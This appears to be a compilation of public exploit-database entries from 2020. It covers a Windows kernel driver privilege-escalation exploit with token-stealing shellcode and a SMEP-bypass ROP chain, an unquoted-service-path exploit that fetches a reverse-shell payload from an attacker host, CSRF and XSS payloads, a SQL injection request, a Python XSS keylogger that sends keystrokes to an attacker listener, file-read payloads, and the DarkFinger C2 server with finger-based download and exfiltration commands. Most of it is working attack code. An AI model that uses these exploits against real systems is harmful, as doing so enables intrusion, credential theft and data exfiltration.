//found_system:
"\x48\x8B\x41\x70" // mov rax, [rcx + 70h] ; Offset from ActiveProcessLinks to Token
"\x24\xF0" // and al, 0f0h ; Clear low 4 bits of _EX_FAST_REF structure
//find cmd
"\x48\x8B\x51\xF8" // mov rdx, [rcx-8] ;ActiveProcessLinks - 8 = UniqueProcessId
"\x48\x81\xFA\x99\x99\x00\x00" // cmp rdx, 0d54h ;UniqueProcessId == ZZZZ? (PLACEHOLDER)
"\x74\x05" // jz found_cmd ;YES - move on
"\x48\x8B\x09" // mov rcx, [rcx] ;NO - next entry in list
"\xEB\xEE" // jmp find_cmd ;loop
// found cmd
"\x48\x89\x41\x70" // mov [rcx+70h], rax ;copy SYSTEM token over top of this process's token
"\x48\x31\xc9" // xor rcx rcx ; clear some registers to avoid issues while unwinding the call stack
"\x48\x31\xc0" // xor rax rax
"\x48\x31\xf6" // xor rsi,rsi
"\x48\x31\xff" // xor rdi, rdi
"\x4D\x31\xC0" // xor r8, r8
"\x48\xc7\xc1\xf8\x06\x15\x00" // mov rcx, 0x1506f8 ; move original cr4 value into rcx
"\xc3"; // ret ; RET
token_steal[54] = pid;
token_steal[55] = pid >> 8;
LPVOID allocated_shellcode = VirtualAlloc(NULL,
sizeof(token_steal),
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
memcpy(allocated_shellcode, token_steal, sizeof(token_steal));
INT64 pop_rcx_offset = kernel_base + 0x15fc70; // gadget 1 1709 - pop rcx ; ret
INT64 mov_cr4_offset = kernel_base + 0x76a02; // gadget 2 1709 - mov cr4, ecx ; ret
INT64 wbindv_offset = kernel_base + 0x1175c0;; // gadget 3 1709 - wbinvd; ret
INT64 rcx_value = 0x506f8; // value we want placed in cr4 in order to disable SMEP
INT64 rcx_old_value = 0x1506f8; // original cr4 value
INT64 ret = pop_rcx_offset + 1; // RET NOP
puts("[+] SMEP disabled");
BYTE input_buff[136] = { 0 };
memset(input_buff, '\x41', 64);
memset(input_buff, '\x42', 8); // dummy RBP
memcpy(input_buff + 72, (PINT64)&pop_rcx_offset, 8); // pop rcx
memcpy(input_buff + 80, (PINT64)&rcx_value, 8); // disable SMEP value
memcpy(input_buff + 88, (PINT64)&mov_cr4_offset, 8); // mov cr4, rcx
memcpy(input_buff + 96, (PINT64)&wbindv_offset, 8); // wbinvd; ret
memcpy(input_buff + 104, (PINT64)&allocated_shellcode, 8);// shellcode
memcpy(input_buff + 112, (PINT64)&mov_cr4_offset, 8); // mov cr4, rcx
memcpy(input_buff + 120, (PINT64)&ret, 8); // RETNOP to restore the stack
memcpy(input_buff + 128, (PINT64)&ret, 8); // RETNOP to restore the stack
printf("[+] Payload buffer located at: 0x%p\n", &allocated_shellcode);
DWORD lpBytesReturned = 0x0;
BOOL triggerIOCTL = DeviceIoControl(hFile,
IoControlCode,
input_buff,
sizeof(input_buff),
NULL,
0,
&lpBytesReturned,
NULL);
if (!triggerIOCTL) {
printf("[!] DeviceIoControl failed: %d\n", GetLastError());
}
else {
puts("[+] SMEP re-enabled");
puts("[+] Enjoy your SYSTEM shell\n");
}
system("start cmd.exe");
}
LPVOID GetBaseAddr(const char* drvname) {
LPVOID drivers[1024];
DWORD cbNeeded;
int nDrivers, i = 0;
if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
char szDrivers[1024];
nDrivers = cbNeeded / sizeof(drivers[0]);
for (i = 0; i < nDrivers; i++) {
if (GetDeviceDriverBaseNameA(drivers[i], (LPSTR)szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
if (strcmp(szDrivers, drvname) == 0) {
return drivers[i];
}
}
}
}
return 0;
}
HANDLE GetDriverHandle() {
HANDLE hMsio;
hMsio = CreateFileA("\\\\.\\MsIo",
FILE_READ_ACCESS | FILE_WRITE_ACCESS,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
NULL);
if (hMsio == INVALID_HANDLE_VALUE) {
printf("[-] Error obtaining an handle to the driver: %d\n", GetLastError());
exit(1);
}
return hMsio;
}
int main() {
puts("[*] CVE-2020-17382 - Win10 1709 - PoC by Matteo 'uf0' Malvica");
DWORD IoControlCode = 0x80102040;
HANDLE hDevice = GetDriverHandle();
INT64 nt = (INT64)GetBaseAddr("ntoskrnl.exe");
DWORD pid = GetCurrentProcessId();
eopMsio(hDevice, nt, pid, IoControlCode);
return 0;
}
# Exploit Title: Pearson Vue VTS 2.3.1911 Installer - 'VUEApplicationWrapper' Unquoted Service Path
# Discovery by: Jok3r
# Discovery Date: 2020-09-14
# Vendor Homepage: https://home.pearsonvue.com/
# Software Link: https://vss.pearsonvue.com/VSSFiles/Documents/ENU_TCInstallGuide/Download_VTS_Installer.htm
# Tested Version: 2.3.1911
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
#Description:
The Application Wrapper is the component that automates the Pearson VUE
Testing System. The Wrapper is a scheduler that runs in the background on
the test center’s server.
VUEApplicationWrapper service has an unquoted service path vulnerability
and insecure file permissions on "\Pearson VUE\" directory that allows to
overwrite by everyone
so that unauthorized local user can leverage privileges to VUEService user
that has administrative rights.
# Detection of unquoted service path:
C:\Users\VUEService>wmic service get name, pathname, displayname, startmode
| findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Pearson" |
findstr /i /v """
VUE Application Wrapper
VUEApplicationWrapper C:\Pearson VUE\VUE
Testing System\bin\VUEWrapper.exe
Auto
C:\Users\VUEService>sc qc VUEApplicationWrapper
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: VUEApplicationWrapper
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Pearson VUE\VUE Testing
System\bin\VUEWrapper.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : VUE Application Wrapper
DEPENDENCIES : lanmanworkstation
SERVICE_START_NAME : .\VUEService
#Detection of insecure file permissions:
PS C:\Users\VUEService> Get-Acl -Path "c:\Pearson Vue\"
Directory: C:\
Path Owner Access
---- ----- ------
Pearson Vue BUILTIN\Administrators Everyone Allow FullControl...
#Exploit code:
@ECHO OFF
ECHO [+] executing command: "wmic service get
name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i
"Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """"
wmic service get name,pathname,displayname,startmode | findstr /i "Auto" |
findstr /i "Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """
sc qc VUEApplicationWrapper
powershell.exe -ep bypass -nop -c "Get-Acl -Path 'c:\Pearson Vue\'"
ECHO [+] Enumeration was completed successfully.
::Create VUE.exe with following commands on your kali and serve it on port
80. Also listen port 443 with netcat for reverse shell.
::msfvenom -p windows/x64/shell/reverse_tcp LHOST=<Your IP Address>
LPORT=443 -f exe > VUE.exe
ECHO [*] If you create VUE.exe under "\Pearson VUE\" directory with your
privileges, you might be able to get VUEService user privileges after
windows was rebooted.
certutil -urlcache -split -f http://<YOUR_IP_ADDRESS>/VUE.exe "C:\Pearson
VUE\VUE.exe"
ECHO [*] Downloading VUE executable...
PAUSE
IF EXIST "C:\Pearson VUE\VUE.exe" (
ECHO [+] The download was successful.
) ELSE (
ECHO [-] The download was unsuccessful.
PAUSE
)
ECHO [!] If you continue, system will be rebooted.
PAUSE
shutdown /r /t 0
::code end
# Exploit Title: Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path
# Date: 2020-08-31
# Exploit Author: Angelo D'Amato
# Vendor Homepage: https://www.rapid7.com
# Version: <=6.6.39
# CVE :N/A
Rapid7 Nexpose Installer 6.6.39 Local Privilege Escalation
Vendor: Rapid7
Product web page: https://www.rapid7.com
Affected version: <=6.6.39
Summary: Rapid7 Nexpose is a vulnerability scanner which aims to support
the entire vulnerability management lifecycle, including discovery, detection,
verification, risk classification, impact analysis, reporting and mitigation.
It integrates with Rapid7's Metasploit for vulnerability exploitation.
Desc: Rapid7 Nexpose installer version prior to 6.6.40 uses a search path
that contains an unquoted element, in which the element contains whitespace
or other separators. This can cause the product to access resources in a parent
path, allowing local privilege escalation.
Tested on: Microsoft Windows 10 Enterprise, x64-based PC
Microsoft Windows Server 2016 Standard, x64-based PC
Vulnerability discovered by Angelo D'Amato
@zeroscience
Advisory ID: ZSL-2019-5587
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5587.php
07.08.2020
--
C:\Users\test>sc qc nexposeengine
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: nexposeengine
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\rapid7\nexpose\nse\bin\nxengine.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Nexpose Scan Engine
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit Title: RAD SecFlow-1v SF_0290_2.3.01.26 - Cross-Site Request Forgery (Reboot)
# Date: 2020-08-31
# Exploit Author: Uriel Yochpaz and Jonatan Schor
# Vendor Homepage: https://www.rad.com/products/secflow-1v-IIoT-Gateway
# Version: SecFlow-1v os-image SF_0290_2.3.01.26
# Tested on: RAD SecFlow-1v
# CVE : N/A
A vulnerability in the web-based management interface of RAD SecFlow-1v
could allow an unauthenticated, remote attacker to conduct a cross-site
request forgery (CSRF) attack on an affected system.
The vulnerability is due to insufficient CSRF protections for the web UI on
an affected device.
An attacker could exploit this vulnerability by persuading a user of the
interface to follow a malicious link. A successful exploit could allow the
attacker to perform arbitrary actions with the privilege level of the
affected user.
This could be exploited in conjunction with CVE-2020-13260.
# Proof of Concept
By persuading an authenticated user to open a web page containing the
following code:
<img src="https://SecFlow-1v_IP/devicereboot.php?restart=1&isSubmitted=1">
A reboot operation would begin.
This attack could execute any operation available at the web-based
management interface (File uploads, Scheduled and immediate reboots,
Factory reset etc.)
# Full Account Takeover
As mentioned above, this exploit could be used in conjunction with
CVE-2020-13260 (Stored-XSS), by using the CSRF exploit to upload a
malicious file to a Stored-XSS vulnerabale page, which could allow Full
Account Takeover.
For further information and full PoC:
https://github.com/UrielYochpaz/CVE-2020-13259
# Timeline
May 19th, 2020 - Vulnerability exposed.
May 19th, 2020 – Vulnerability reported to RAD.
May 21th, 2020 – Vulnerability reported to MITRE.
May 21th, 2020 – MITRE assigned CVE: CVE-2020-13259.
May 22th, 2020 – Contacted RAD for further details and cooperation.
Aug 25th, 2020 – RAD patched the vulnerability.
# Exploit Title: RAD SecFlow-1v SF_0290_2.3.01.26 - Persistent Cross-Site Scripting
# Date: 2020-08-31
# Exploit Author: Jonatan Schor and Uriel Yochpaz
# Vendor Homepage: https://www.rad.com/products/secflow-1v-IIoT-Gateway
# Version: SecFlow-1v os-image SF_0290_2.3.01.26
# Tested on: RAD SecFlow-1v
# CVE : N/A
A Stored-XSS vulnerability was found in multiple pages in the web-based
management interface of RAD SecFlow-1v.
An attacker could exploit this vulnerability by uploading a malicious file
as the OVPN file in Configuration-Services-Security-OpenVPN-Config or as
the static key file in Configuration-Services-Security-OpenVPN-Static Keys.
These files content is presented to users while executing malicious stored
JavaScript code.
This could be exploited in conjunction with CVE-2020-13259
# Proof of Concept
Upload a file containing the following JS code:
<img src=x onerror=alert(1)>
Refresh the page and observe the malicious JS code execute every time you
browse the compromised page.
# Full Account Takeover
As mentioned above, this exploit could be used in conjunction with
CVE-2020-13259 (CSRF), by using the CSRF exploit to upload a malicious file
to a Stored-XSS vulnerabale page, which could allow Full Account Takeover.
For further information and full PoC:
https://github.com/UrielYochpaz/CVE-2020-13259
# Timeline
May 19th, 2020 - Vulnerability exposed.
May 19th, 2020 – Vulnerability reported to RAD.
May 21th, 2020 – Vulnerability reported to MITRE.
May 21th, 2020 – MITRE assigned CVE: CVE-2020-13260.
May 22th, 2020 – Contacted RAD for further details and cooperation.
Aug 25th, 2020 – RAD patched the vulnerability.
# Exploit Title: Joomla! paGO Commerce 2.5.9.0 - SQL Injection (Authenticated)
# Date: 2020-08-21
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
# Author ID: 8763
# Vendor Homepage: https://www.corephp.com/
# Software Link: https://www.corephp.com/joomla-products/pago-commerce
# Version: 2.5.9.0
# Tested on: Apache2
Vulnerable param: filter_published
-------------------------------------------------------------------------
POST /joomla/administrator/index.php?option=com_pago&view=comments HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 163
Origin: http://localhost
Connection: close
Referer: http://localhost/joomla/administrator/index.php?option=com_pago&view=comments
Cookie: 4bde113dfc9bf88a13de3b5b9eabe495=sp6rp5mqnihh2i323r57cvesoe; crisp-client%2Fsession%2F0ac26dbb-4c2f-490e-88b2-7292834ac0e9=session_a9697dd7-152d-4b1f-a324-3add3619b1e1
Upgrade-Insecure-Requests: 1
filter_search=&limit=10&filter_published=1&task=&controller=comments&boxchecked=0&filter_order=id&filter_order_Dir=desc&5a672ab408523f68032b7bdcd7d4bb5c=1
-------------------------------------------------------------------------
sqlmap poc:
sqlmap -r pago --dbs --risk=3 --level=5 --random-agent -p filter_published
[Gais Security]<https://www.gaissecurity.com>
[Gais Security]
[Gais Security]
Mehmet KELEPÇE
Penetration Tester | Red Team
# Exploit Title: Tailor MS 1.0 - Reflected Cross-Site Scripting
# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
# Date: 2020-09-14
# CVE ID: CVE-2020-23835
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/tailor.zip
# Version: 1.0
# Tested On: Windows 10 Pro + XAMPP | Python 2.7
# OWASP Top Ten 2017: A7:2017-Cross-Site Scripting (XSS)
# CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - Type 1: Reflected XSS
# CWE-523: Unprotected Transport of Credentials
# CVSS Base Score: 6.4 # Impact Subscore: 4.7 # Exploitability Subscore: 1.6
# CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:L
# Vulnerability Description:
# Reflected Cross-Site Scripting (XSS) vulnerability in 'index.php' login-portal webpage of SourceCodesters Tailor Management System v1.0 allows remote attackers to harvest keys pressed via unauthenticated victim clicking malicious URL and typing.
# Reflected XSS Key Logger
import socket,sys,urllib,re
from thread import *
from colorama import Fore, Style
F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE]
S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT]
ok = S[3]+F[2]+')'+F[5]+'+++'+F[2]+'['+F[8]+'========> '+S[0]+F[0]
err = S[3]+F[2]+'<========'+F[2]+'('+F[5]+'+++'+F[2]+'( '+F[0]+S[0]
R, C, G = Fore.RED, Fore.CYAN, Fore.GREEN
def urlEncode(javascript):
return urllib.quote(javascript)
def genXssPayload(LHOST,LPORT):
XSS_PAYLOAD = '<script>'
XSS_PAYLOAD += 'var xhr = new XMLHttpRequest();'
XSS_PAYLOAD += 'document.onkeypress = function keyLogger(key) {'
XSS_PAYLOAD += 'key_press = String.fromCharCode(key.which);'
XSS_PAYLOAD += 'var uri = "http://'+LHOST+':'+LPORT+'?KEY="+key_press;'
XSS_PAYLOAD += 'xhr.open("GET", uri, true);'
XSS_PAYLOAD += 'xhr.send();}'
XSS_PAYLOAD += '</script>'
return XSS_PAYLOAD
def clientthread(conn):
try:
while True:
data = conn.recv(1024)
key = re.findall(r'KEY\=\w',data)
key = re.sub('KEY\=','',key[0])
print(printKey(key))
if not data:
break
except:
conn.close()
def banner():
BANNER = S[3]+C+' _______ _______ _______ _______ _______ _______ _______ _______ _______ _______ _______ _______ \n'
BANNER += C+'|\ /|\ /|\ /| |\ /|\ /|\ /| |\ /|\ /|\ /|\ /|\ /|\ /|\n'
BANNER += C+'| +---+ | +---+ | +---+ | | +---+ | +---+ | +---+ | | +---+ | +---+ | +---+ | +---+ | +---+ | +---+ |\n'
BANNER += C+'| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |\n'
BANNER += C+'| | '+R+'X'+C+' | | | '+R+'$'+C+' | | | '+R+'$'+C+' | | | | '+R+'K'+C+' | | | '+R+'3'+C+' | | | '+R+'Y'+C+' | | | | '+R+'L'+C+' | | | '+R+'0'+C+' | | | '+R+'G'+C+' | | | '+R+'G'+C+' | | | '+R+'3'+C+' | | | '+R+'R'+C+' | |\n'
BANNER += C+'| +---+ | +---+ | +---+ | | +---+ | +---+ | +---+ | | +---+ | +---+ | +---+ | +---+ | +---+ | +---+ |\n'
BANNER += C+'|/_____\|/_____\|/_____\| |/_____\|/_____\|/_____\| |/_____\|/_____\|/_____\|/_____\|/_____\|/_____\|\n\r\n'
BANNER += ' '+R+'BOKU '+F[0]+'&'+C+' HYD3SEC'+F[0]+S[0]+'\r\n'
return BANNER
def printKey(key):
keyGen = S[3]+C+' _______\n'
keyGen += C+' |\ /|\n'
keyGen += C+' | +---+ |\n'
keyGen += C+' | | | |\n'
keyGen += C+' | | '+R+key+C+' | |\n'
keyGen += C+' | +---+ |\n'
keyGen += C+' |/_____\|'+F[0]+S[0]
return keyGen
def header():
head = S[1]+F[2]+' __---* '+F[7]+'Tailor MS v1.0 '+F[2]+'| '+F[7]+'Reflected XSS Key Logger '+F[2]+'*---__\n'+S[0]
return head
def formatHelp(STRING):
return S[3]+F[2]+STRING+S[0]
if __name__ == "__main__":
print(header())
print(banner())
if len(sys.argv) != 4:
print(ok+formatHelp(" Usage: python %s <WEBAPP_URL> <LHOST> <LPORT>" % sys.argv[0]))
print(ok+formatHelp(" Example: python %s 'http://172.16.65.134/tailor/' '172.16.65.1' 80\r\n" % sys.argv[0]))
print(err+"Try Again..\r\n")
sys.exit(-1)
WEBAPP_URL = sys.argv[1]
LHOST = sys.argv[2]
LPORT = sys.argv[3]
if not re.match(r".*/$", WEBAPP_URL):
WEBAPP_URL = WEBAPP_URL+'/'
WEBAPP_URL = WEBAPP_URL+'index.php'
PAYLOAD = genXssPayload(LHOST,LPORT)
ENCODED_PAYLOAD = urlEncode(PAYLOAD)
print(ok+F[0]+'To '+S[3]+F[2]+'Harvest Keys'+F[0]+S[0]+', have a'+F[3]+' User '+F[0]+'visit '+F[5]+'this URL'+F[0]+' and '+F[7]+'Login'+F[0]+':\r\n')
print(S[3]+F[5]+WEBAPP_URL+'?error=ALL%20YOUR%20K3Y$%20ARE%20BELONG%20TO%20US.%20'+ENCODED_PAYLOAD+S[0]+'\r\n')
LPORT = int(LPORT)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((LHOST,LPORT))
print(ok+S[1]+G+"Binding to Socket."+F[0]+S[0])
s.listen(100)
print(ok+S[1]+G+"Listening on Socket for incoming connections."+F[0]+S[0])
try:
while 1:
conn, addr = s.accept()
start_new_thread(clientthread ,(conn,))
except:
s.close()
print('\r\n'+err+"Exiting Keylogger Credential Harvester..")
# Exploit Title: ThinkAdmin 6 - Arbitrarily File Read
# Google Dork: N/A
# Date: 2020-09-14
# Exploit Author: Hzllaga
# Vendor Homepage: https://github.com/zoujingli/ThinkAdmin/
# Software Link: Before https://github.com/zoujingli/ThinkAdmin/commit/ff2ab47cfabd4784effbf72a2a386c5d25c43a9a
# Version: v6 <= 2020.08.03.01
# Tested on: PHP7.4.7,Apache
# CVE : CVE-2020-25540
PoC:
On Windows read database.php payload:
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34
On Linux read /etc/passwd payload:
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s
# Title: Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software
# Author: John Page (aka hyp3rlinx)
# Date: 2020-09-16
# Website: hyp3rlinx.altervista.org
# Source: http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt
# twitter.com/hyp3rlinx
# ISR: ApparitionSec
Microsoft Windows TCPIP Finger Command "finger.exe" that ships with the OS, can be used as a file downloader and makeshift C2 channel.
Legitimate use of Windows Finger Command is to send Finger Protocol queries to remote Finger daemons to retrieve user information.
However, the finger client can also save the remote server response to disk using the command line redirection operator ">".
Intruders who compromise a computer may find it is locked down and "unknown" applications may be unable to download programs or tools.
By using built-in native Windows programs, its possible they may be whitelisted by installed security programs and allowed to download files.
Redteams and such using LOL methods have made use of "Certutil.exe", native Windows program for downloading files. However, Certutil.exe is
recently blocked by Windows Defender Antivirus and logged as event "Trojan:Win32/Ceprolad.A" when it encounters http/https://.
Therefore, using Windows finger we can bypass current Windows Defender security restrictions to download tools, send commands and exfil data.
The Finger protocol as a C2 channel part works by abusing the "user" token of the FINGER Query protocol "user@host". C2 commands masked as
finger queries can download files and or exfil data without Windows Defender interference.
Download files:
C:\> finger <C2-Command>@HOST > Malwr.txt
Exfil running processes:
C:\> for /f "tokens=1" %i in ('tasklist') do finger %i@192.168.1.21
Typically, (Port 79) default port used by FINGER protocol is often blocked by organizations. Privileged users can bypass this using
Windows NetSh Portproxy. This can allow us to bypass Firewall restrictions to reach servers using unrestricted ports like 80/443.
Portproxy queries are then sent first to the Local Machines ip-address which are then forwarded to the C2 server specified.
Port 43 (WHOIS) traffic.
netsh interface portproxy add v4tov4 listenaddress=[LOCAL-IP] listenport=79 connectaddress=[C2-Server] connectport=43
netsh interface portproxy add v4tov4 listenaddress=[LOCAL-IP] listenport=43 connectaddress=[LOCAL-IP] connectport=79
To display Portproxy use "C:\>netsh interface portproxy show all".
E.g. using Port 79
Ncat64.exe "nc@C2-Server" > tmp.txt
E.g. using Portproxy, send the query to local-ip first.
Ncat64.exe "nc@Local-IP" > tmp.txt
To leverage Windows finger.exe successfully as a file downloader and help evade network security devices, serve Base64 encoded text-files.
DarkFinger.py expects to receive the first two characters of the filename for the Finger Protocol Host token part for file downloads.
DarkFinger C2 expects exfil data to prefixed with the dot "." character, so any arbitrary inbound querys are not confused for exfil.
This can be changed to whatever or even expanded upon to use XOR obfuscation methods etc... as this is just for basic PoC.
[Event Logs / Forensics]
Certutil.exe file downloads are now blocked and logged by Windows Defender.
"Windows Defender Antivirus has taken action to protect this machine from malware or other potentially unwanted software.
Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
... etc"
PowerShell, also used as an LOL method to download files usually generates Windows event logs. Finger initiated downloads write
to disk and will leave forensic artifacts. Finger TCP/IP traffic going out to Port 80/443 minus the HTTP protocol may stand out as well.
However, searching the Windows event logs for finger.exe entries, I found no trace of it generating Windows event logs anywhere.
DarkFinger.py C2 is very basic with no security. It's only to demonstrate using Windows Finger Command for as a C2 channel
and show the possibilities. Therefore, anyone can request to change the Port DarkFinger C2 listens on and or download files.
During my research, I found nothing on the internet publicly using or documenting Windows TCPIP Finger Command for use as C2 channel.
Therefore, I release "DarkFinger.py" C2 server and "DarkFinger-Agent.bat" which calls the Windows finger.exe in attacker friendly ways.
Tested successfully Windows 10.
[DarkFinger-C2.py]
import socket,sys,re,time,os,argparse
from subprocess import *
from subprocess import Popen, PIPE, STDOUT
#DarkFinger / Windows Finger TCPIP Command C2 Server (c)
#Downloader and Covert Data Tunneler
#By John Page (aka hyp3rlinx)
#ApparitionSec
#twitter.com/hyp3rlinx
#
#File Downloads must be Base64 encoded text-files.
#Agents can change the port DarkFinger listens on dynamically:
#E.g. set to listen on port 80
#C:\>finger.exe !80!@DarkFinger-Server
#When not using Port 79, we need a Portproxy to send Port 79 traffic outbound to the specified Port.
#Also, when using Ports other than Port 79 (default) we issue queries first to the machine running the Agent E.g.
#C:\>finger.exe <Command>@<Local-Machines-IP>
#
#Agents can change the Download wait time, to try an ensure files are fully downloaded before closing connections.
#Default time sent by the DF-Agent.bat PoC script is set to 10 seconds when issuing Download commands.
#Changing wait time before closing the socket when downloading PsExec64.exe E.g.
#C:\>finger.exe ps%<Wait-Time-Secs>%@%<DarkFinger-Server>%
#==============================================================================================================
#
port = 79 #Default if the client unable to Portproxy, use port 80/443 if possible.
downloads_dir = "Darkfinger_Downloads" #Directory containing the Base64 encoded files for download
nc64 = downloads_dir+"\\nc.txt" #Base64 encoded Netcat
psexec = downloads_dir+"\\ps.txt" #Base64 encoded PsExec64
byte_sz = 4096 #Socket recv
allowed_ports = [22,43,53,79,80,443] #Restrict to a few.
BANNER="""
____ __ _______
/ __ \____ ______/ /__/ ____(_)___ ____ ____ _____
/ / / / __ `/ ___/ //_/ /_ / / __ \/ __ `/ _ \/ ___/
/ /_/ / /_/ / / / ,< / __/ / / / / / /_/ / __/ /
/_____/\__,_/_/ /_/|_/_/ /_/_/ /_/\__, /\___/_/
/____/ v1
Finger TCPIP Command C2 Server
By hyp3rlinx
ApparitionSec
"""
def remove_cert_info(f):
try:
r1 = open(f)
lines = r1.readlines()
lines = lines[1:]
r1.close()
w1 = open(f,'w')
w1.writelines(lines)
w1.close()
r2 = open(f)
lines2 = r2.readlines()
lines2 = lines2[:-1]
r2.close()
w2 = open(f,'w')
w2.writelines(lines2)
w2.close()
except Exception as e:
print(str(e))
exit()
def create_base64_files(file_conf):
global downloads_dir
if os.path.exists(file_conf):
if os.stat(file_conf).st_size == 0:
print("[!] Warn: Supplied conf file is empty, no downloads were specified!")
exit()
else:
print("[!] Supplied conf file does not exist :(")
exit()
try:
path=os.getcwd()
if not os.path.exists(path+"\\"+downloads_dir):
os.makedirs(downloads_dir)
f=open(file_conf, "r")
for x in f:
x = x.strip()
if os.path.exists(path+"\\"+x):
proc = Popen(["certutil.exe", "-encode", path+"\\"+x, path+"\\"+downloads_dir+"\\"+x[:2].lower()+".txt"],
stdout=PIPE, stderr=PIPE, shell=False)
out, err = proc.communicate()
if "ERROR_FILE_EXISTS" in str(out):
print("[!] Cannot encode " + x[:2]+".txt" + " as it already exists, delete it (-d flag) and try again :(")
exit()
time.sleep(0.5)
#Remove certificate info generated by Windows Certutil.
if os.path.exists(path+"\\"+downloads_dir+"\\"+x[:2].lower()+".txt"):
remove_cert_info(path+"\\"+downloads_dir+"\\"+x[:2].lower()+".txt")
print("[+] Created " + x + " Base64 encoded text-file "+x[:2].lower()+".txt" +" for download.")
else:
print("[!] Warn: File specified in the conf file to Base64 encode ("+x+") does not exist!")
exit()
f.close()
except Exception as e:
print(str(e))
def delete_base64_files():
global downloads_dir
path=os.getcwd()
if os.path.exists(path+"\\"+downloads_dir):
try:
filelist = [ f for f in os.listdir(path+"\\"+downloads_dir) if f.endswith(".txt") ]
for f in filelist:
os.remove(os.path.join(path+"\\"+downloads_dir, f))
except Exception as e:
print(str(e))
exit()
def B64Exec(t):
payload=""
try:
f=open(t, "r")
for x in f:
payload += x
f.close()
except Exception as e:
pass
print(str(e))
return 9
return payload
def finga_that_box(cmd, victim):
cmd = cmd.rstrip()
if cmd[:1] != ".":
cmd = cmd[0:2]
if cmd == "nc":
print("[+] Serving Nc64.exe")
sys.stdout.flush()
return nc64
if cmd == "ps":
print("[+] Serving PsExec64.exe")
sys.stdout.flush()
return psexec
if cmd[:1] == ".":
print("[+] Exfil from: "+ victim[0] + " " +cmd[1:])
sys.stdout.flush()
return False
def fileppe_fingaz():
global byte_sz, port, allowed_ports
delay=1
s = socket.socket()
host = ""
try:
if port in allowed_ports:
s.bind((host, port))
s.listen(5)
else:
print("[!] Port disallowed, you can add it to the 'allowed_ports' list.")
exit()
except Exception as e:
print(str(e))
exit()
print("[/] Listening port:", str(port))
sys.stdout.flush()
try:
while True:
conn, addr = s.accept()
a = conn.recv(byte_sz).decode() #Py 2
#Let agent change port dynamically
try:
if a[:1]=="!":
idx = a.rfind("!")
if idx != -1:
port = str(a[1:idx])
if int(port) in allowed_ports:
port = int(port)
time.sleep(1)
conn.close()
s.close()
fileppe_fingaz()
else:
print("[!] Disallowed port change request from: %s" % addr[0])
#Let agent set time to wait dynamically.
if a[:1] != "." and a[:1] != "!":
if re.search(r'\d\d', a[2:4]):
delay=int(a[2:4])
print("[-] Agent set the delay to: %d" % delay)
sys.stdout.flush()
except Exception as e:
print(str(e))
pass
t = finga_that_box(a, addr)
if t:
exe = B64Exec(t)
if exe == 9:
conn.close()
continue
if exe:
try:
conn.sendall(exe.encode())
time.sleep(delay)
conn.close()
delay=1
except Exception as e:
pass
#print(str(e))
sys.stdout.flush()
conn.close()
delay=1
s.close()
except Exception as e:
print(str(e))
pass
finally:
s.close()
fileppe_fingaz()
def about():
print("[+] Darkfinger is a basic C2 server that processes Windows TCPIP Finger Commands.")
print(" ")
print("[+] File download requests require the first two chars (lowercase) for the file we want,")
print("[+] plus the wait time, this trys to ensure a full transmit before close the connection.")
print("[+] Download Ncat64.exe and wait 30-secs before closing the socket:")
print("[+] finger.exe nc30@DarkFinger > tmp.txt")
print(" ")
print("[+] Exfil Windows Tasklist using the '.' character used as the DarkFinger exfil flag:")
print("[+] cmd /c for /f \"tokens=1\" %i in ('tasklist') do finger .%i@DarkFinger-Server")
print("[+]")
